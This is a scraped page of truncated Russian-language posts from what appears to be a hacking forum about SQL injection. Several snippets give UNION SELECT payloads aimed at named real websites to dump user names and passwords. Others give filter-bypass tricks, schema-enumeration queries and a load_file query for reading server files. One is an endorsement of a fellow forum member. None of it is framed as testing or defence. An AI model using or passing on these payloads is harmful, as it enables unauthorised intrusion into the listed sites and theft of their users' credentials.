Separate names with a comma.
Понятия не имею как работает sqlmap бо никогда им не пользовался, но, скорее всего, проблема заключается в том, что там используется 2 sql запроса...
Ну и если кому-то по эстетическим причинам не нравится error based, то так оно тоже вполне себе работает...
Помимо такого обхода пробела можно еще попытаться использовать %0a, иногда срабатывает. Также, проверить на фильтрацию чего либо (в данном случае...
Да, он только под винду, но ничего не мешает сделать так: wine odysseus.exe
Работал с человеком. Все быстро и четко)
1) Если не известно название БД, то узнать его можно таким запросом Select table_schema from information_schema.tables where table_name =...
http://stomjob.ru/index.php?sub=show_vacancybyid POST: vacby_id=1 union select...
Логично же - не вставлять кавычку :) И в этом конкретном примере вывод получить не удастся из-за двух запросов, выполняющихся подряд: SELECT *...
Для просмотра файлов при ограничении вывода можно использовать запрос вида select substring(load_file('/patch/to/file/file.conf'),1,100) Где...
http://redbox.sg/products.php ?cat_id=-61+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from user--...
http://www.suncellular.com.ph/phone_detail.php?id=-79+union+select+1,concat(user,0x3a,pass),3,4,5,6...
Как-то я не особо понял что там такого сложного http://www.masterpiecedistribution.com/shop/ultime_uscite.php ?order_id= &id=-22381 union select...
